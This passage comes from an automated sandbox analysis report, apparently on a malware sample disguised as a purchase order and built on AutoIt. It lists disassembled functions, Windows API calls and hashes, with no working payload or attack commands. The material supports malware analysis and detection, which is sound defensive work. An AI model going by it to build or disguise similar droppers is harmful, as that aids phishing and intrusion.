                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                      • String ID:
                      • API String ID: 146765662-0
                      • Opcode ID: e8793eb0344e32e7f795d6876b4fb89d6dd10c0574b119a8eec1235a09bda32b
                      • Instruction ID: 67be32c055e53d763f123d81b83d6cc449ed4f6c6a19e8b012e5340378d35313
                      • Opcode Fuzzy Hash: e8793eb0344e32e7f795d6876b4fb89d6dd10c0574b119a8eec1235a09bda32b
                      • Instruction Fuzzy Hash: 85E0B636104006BBDB026FA5ED09899FB2AFF893213508225F625925B0CF32A835EB90
                      Function 00B0C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CapsDesktopDeviceReleaseWindow
                      • String ID:
                      • API String ID: 2889604237-0
                      • Opcode ID: 2e1827d86028903181ddd0d80985c7d6b0eef0526b450503e4a862881bdf8a74
                      • Instruction ID: d130eb19fe022b0d8f1e3afac55dcab2b4d2d0925db8b24ddb508c3bf435e453
                      • Opcode Fuzzy Hash: 2e1827d86028903181ddd0d80985c7d6b0eef0526b450503e4a862881bdf8a74
                      • Instruction Fuzzy Hash: 1DE0B6B5940304EFDB009F70DC4C6A97BE9EB4C361F51C815F94ACB251DFB999818B50
                      Function 00AB4C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                      Download Yara Rule
                      APIs
                      • __getptd_noexit.LIBCMT ref: 00AB4C3E
                        • Part of subcall function 00AB86B5: GetLastError.KERNEL32(?,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB86B7
                        • Part of subcall function 00AB86B5: __calloc_crt.LIBCMT ref: 00AB86D8
                        • Part of subcall function 00AB86B5: GetCurrentThreadId.KERNEL32 ref: 00AB8701
                        • Part of subcall function 00AB86B5: SetLastError.KERNEL32(00000000,00AB0127,00AB88A3,00AB4673,?,?,00AB0127,?,00A9125D,00000058,?,?), ref: 00AB8719
                      • CloseHandle.KERNEL32(?,?,00AB4C1D), ref: 00AB4C52
                      • __freeptd.LIBCMT ref: 00AB4C59
                      • ExitThread.KERNEL32 ref: 00AB4C61
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                      • String ID:
                      • API String ID: 408300095-0
                      • Opcode ID: d35613538db0a28c6f67c9e7ccabb2c859134fc69596420858bf1ce1f378ac61
                      • Instruction ID: d9b5a92be6f9cb4aa5b5e5e36ed9703731b689fe82313cd04cab6cd60ca95547
                      • Opcode Fuzzy Hash: d35613538db0a28c6f67c9e7ccabb2c859134fc69596420858bf1ce1f378ac61
                      • Instruction Fuzzy Hash: 20D0A731402A519BC53527249E0F6CD375C5F02F26B018304E535160E3CF248C158695
                      Function 00B12350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _memmove
                      • String ID: >$DEFINE
                      • API String ID: 4104443479-1664449232
                      • Opcode ID: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                      • Instruction ID: 806c7863620b6bb0501ec060b98ac1946c11f3725342597ee90c7a9ebaf1b32c
                      • Opcode Fuzzy Hash: 45ac7d665f12590a176ef06c1a2f40bdc064eced800e7bb99adadd18ee082041
                      • Instruction Fuzzy Hash: 25124875A0021ADFCF24CF58C490AEDB7F1FF48310F65819AE859AB355E734A991CB90
                      Function 00ACEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                      Download Yara Rule
                      APIs
                      • OleSetContainedObject.OLE32(?,00000001), ref: 00ACECA0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: ContainedObject
                      • String ID: AutoIt3GUI$Container
                      • API String ID: 3565006973-3941886329
                      • Opcode ID: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                      • Instruction ID: 6781de62abc386363d3392d34e65fc051c3efa0396bcacc9f8271a49525883d6
                      • Opcode Fuzzy Hash: 4120616445fd6d3c2750d464588300e099a9b15bbf340774d726250d4335f020
                      • Instruction Fuzzy Hash: 7A911774600701AFDB14DF68C884F6ABBF9BF49710B1585ADF94ACB291EB70E941CB60
                      Function 00ADE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A93BCF: _wcscpy.LIBCMT ref: 00A93BF2
                        • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                        • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                      • __wcsnicmp.LIBCMT ref: 00ADE785
                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00ADE84E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                      • String ID: LPT
                      • API String ID: 3222508074-1350329615
                      • Opcode ID: 392a66715ccde6240e4a93afa55e13e659005e3f57fcd5154d8967b15206762a
                      • Instruction ID: 1e825b852a1c720edc78d58f464aba1814e9f162bcdb6597e63e0388263f83ec
                      • Opcode Fuzzy Hash: 392a66715ccde6240e4a93afa55e13e659005e3f57fcd5154d8967b15206762a
                      • Instruction Fuzzy Hash: 19615E75A00215AFDB14EB98C995EAEB7F8EF49310F04406AF546AF391DB70AE80DB50
                      Function 00A91B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                      Download Yara Rule
                      APIs
                      • Sleep.KERNEL32(00000000), ref: 00A91B83
                      • GlobalMemoryStatusEx.KERNEL32 ref: 00A91B9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: GlobalMemorySleepStatus
                      • String ID: @
                      • API String ID: 2783356886-2766056989
                      • Opcode ID: d86de97fad2aa9b26eac79f42b453ec4cfeca96489e1106c058bef13f10eafd1
                      • Instruction ID: dced035544eadd9dd1f1afa8b9a494879275d2d1cf3c807f944d28f71384851c
                      • Opcode Fuzzy Hash: d86de97fad2aa9b26eac79f42b453ec4cfeca96489e1106c058bef13f10eafd1
                      • Instruction Fuzzy Hash: 94514871408745ABE720AF14D885BABBBE8FB9A354F81484DF1C8420A1EF75996C8763
                      Function 00ADCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00A9417D: __fread_nolock.LIBCMT ref: 00A9419B
                      • _wcscmp.LIBCMT ref: 00ADCF49
                      • _wcscmp.LIBCMT ref: 00ADCF5C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: _wcscmp$__fread_nolock
                      • String ID: FILE
                      • API String ID: 4029003684-3121273764
                      • Opcode ID: 7f5e1b955a106be5da5f39e8d700f07721fff2bb08773927093908f075ed72ef
                      • Instruction ID: 27137a7d70cd1449fb87b4774a8c96f9a1d1035d73ce816425f2f33ee36156ad
                      • Opcode Fuzzy Hash: 7f5e1b955a106be5da5f39e8d700f07721fff2bb08773927093908f075ed72ef
                      • Instruction Fuzzy Hash: 8641C432A0421ABADF10DBA4CC81FEF7BBA9F49710F50046AF602E7291DB719A45C761
                      Function 00AFA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00AFA668
                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AFA67D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: '
                      • API String ID: 3850602802-1997036262
                      • Opcode ID: acd86716b0ef71e23909664eff2bc866bb47038d76a4da7319b5b886ac45225a
                      • Instruction ID: 495df1c1cf8f6bf678ac70507e2a9fb0cd9edceaecda027a911e450c53bb27d4
                      • Opcode Fuzzy Hash: acd86716b0ef71e23909664eff2bc866bb47038d76a4da7319b5b886ac45225a
                      • Instruction Fuzzy Hash: B841F8B5A003099FDB54CFA8C981BEA7BB5FF19300F14446AEA09EB341D770A945CFA1
                      Function 00AE57D7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AE57E7
                      • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00AE581D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: CrackInternet_memset
                      • String ID: |
                      • API String ID: 1413715105-2343686810
                      • Opcode ID: eb0624f1e3218c59edd3b4a50474681d56d1808e4e278a55898bd12e418cc244
                      • Instruction ID: fbc702b0ffda2a71a75ca783e18ab294e1aa877368e170e7a018820ecc3d4e13
                      • Opcode Fuzzy Hash: eb0624f1e3218c59edd3b4a50474681d56d1808e4e278a55898bd12e418cc244
                      • Instruction Fuzzy Hash: 9F314871D01109ABCF11AFA1DD95EEEBFB8FF19314F104029F816A6162EB319A06DB60
                      Function 00AF9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • DestroyWindow.USER32(?,?,?,?), ref: 00AF961B
                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00AF9657
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$DestroyMove
                      • String ID: static
                      • API String ID: 2139405536-2160076837
                      • Opcode ID: b032040508ddb703691bd893c76f71cb92f3c2a2786875e884451e03eed7a84f
                      • Instruction ID: 570ac72de3f7bf71e022996fd8183b39cfe2308126f9df0deaa0c37e07cb1a08
                      • Opcode Fuzzy Hash: b032040508ddb703691bd893c76f71cb92f3c2a2786875e884451e03eed7a84f
                      • Instruction Fuzzy Hash: F9318D31500208AEEB109FA8DC80BFB77A9FF59764F008619F9A9C7190CB31AC91DB60
                      Function 00AD5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AD5BE4
                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00AD5C1F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: c3560b84b971892192bd58d6afcc0d46ab8d393a8bf813b3e883e9f08422af89
                      • Instruction ID: e500cc9608bf6a9d41d8f52278c11fa0ef69ea8730db8ee5f687bc5bae517240
                      • Opcode Fuzzy Hash: c3560b84b971892192bd58d6afcc0d46ab8d393a8bf813b3e883e9f08422af89
                      • Instruction Fuzzy Hash: 5E31B931E10705ABDB25CFA8D985BEEBBF9EF05350F18001AE983972A1E7B09944CF10
                      Function 00AE6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                      Download Yara Rule
                      APIs
                      • __snwprintf.LIBCMT ref: 00AE6BDD
                        • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: __snwprintf_memmove
                      • String ID: , $$AUTOITCALLVARIABLE%d
                      • API String ID: 3506404897-2584243854
                      • Opcode ID: 7355cedb8dfc60fe05b49c09ebd37a60bd1a96fdc2a64793678e9c95214f3358
                      • Instruction ID: d20e084104fc70c92cc342ea94a7a15bb29ef873bdb636e5a64bc56fc8335be0
                      • Opcode Fuzzy Hash: 7355cedb8dfc60fe05b49c09ebd37a60bd1a96fdc2a64793678e9c95214f3358
                      • Instruction Fuzzy Hash: F9218C31600218AACF10EFA5C982FAE77F5EF94B40F140895F545AB291DB70EE42CBA1
                      Function 00AF91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                      Download Yara Rule
                      APIs
                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00AF9269
                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00AF9274
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: MessageSend
                      • String ID: Combobox
                      • API String ID: 3850602802-2096851135
                      • Opcode ID: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                      • Instruction ID: ef506780229b0692c6e0568aab6a36f902cea0241d241478275a92690ca5bcea
                      • Opcode Fuzzy Hash: 2a8b4ac4929758db3234f62d507c0f0b635340875ef53cd44567ca4c13059e09
                      • Instruction Fuzzy Hash: 7411607164020DBFEF25CF98DC81FFB37AAEB893A4F104125FA1897290D6719C518BA0
                      Function 00AF970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00AAC619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AAC657
                        • Part of subcall function 00AAC619: GetStockObject.GDI32(00000011), ref: 00AAC66B
                        • Part of subcall function 00AAC619: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AAC675
                      • GetWindowRect.USER32(00000000,?), ref: 00AF9775
                      • GetSysColor.USER32(00000012), ref: 00AF978F
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                      • String ID: static
                      • API String ID: 1983116058-2160076837
                      • Opcode ID: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                      • Instruction ID: 25f0a4c5f316fd940285bbaa6a3382abea640dcb6237595f0a7e8f34de9ef7aa
                      • Opcode Fuzzy Hash: a55a7001c7763e86d8fd4dbcfb1861d48e63e3b6f0d6b7fafcbe80a9373dc2b3
                      • Instruction Fuzzy Hash: 2B113A72520209AFDB04DFB8CC45EFA7BB8EB08314F004929FA55E3150E735E851DB50
                      Function 00AF9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                      Download Yara Rule
                      APIs
                      • GetWindowTextLengthW.USER32(00000000), ref: 00AF94A6
                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00AF94B5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: LengthMessageSendTextWindow
                      • String ID: edit
                      • API String ID: 2978978980-2167791130
                      • Opcode ID: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                      • Instruction ID: cea23f0193ff4d33b2c71507428af38a4fdab51f5e14c5f68eec6bd039b25385
                      • Opcode Fuzzy Hash: 08f17c5123bb6cbe8d8b59b06a1410dcc0290c2e9a15be98b96b32b26b62c059
                      • Instruction Fuzzy Hash: C3112B71500208AAEB108FA89C45FFB3B69EB25375F504724FA65971E0C7759C529B60
                      Function 00AD5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                      Download Yara Rule
                      APIs
                      • _memset.LIBCMT ref: 00AD5CF3
                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00AD5D12
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051210659.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_a90000_Purchase Order TE- 00011-7777.jbxd
                      Similarity
                      • API ID: InfoItemMenu_memset
                      • String ID: 0
                      • API String ID: 2223754486-4108050209
                      • Opcode ID: 30b73b0a7b36c96991d814ca60f97a1f1ba6c488ef6fc400932169cf69342f77
                      • Instruction ID: a854de6b16e929465288ee2b0354a1bc8cebc8f60d320ac164b5059d468f13a3
                      • Opcode Fuzzy Hash: 30b73b0a7b36c96991d814ca60f97a1f1ba6c488ef6fc400932169cf69342f77
                      • Instruction Fuzzy Hash: B5119072D11618ABDB60DB7CD848B9977FAAB06744F180063ED92EB390D770AD04CBA1
                      Function 00AE53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                      Download Yara Rule
                      APIs
                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00AE544C
                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00AE5475
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2051075044.0000000000A91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true
                      • Associated: 00000000.00000002.2051055955.0000000000A90000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051133907.0000000000B3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2051183845.0000000000B4A000.00000004.00000001.01000000.00000003.sdmpDownload File
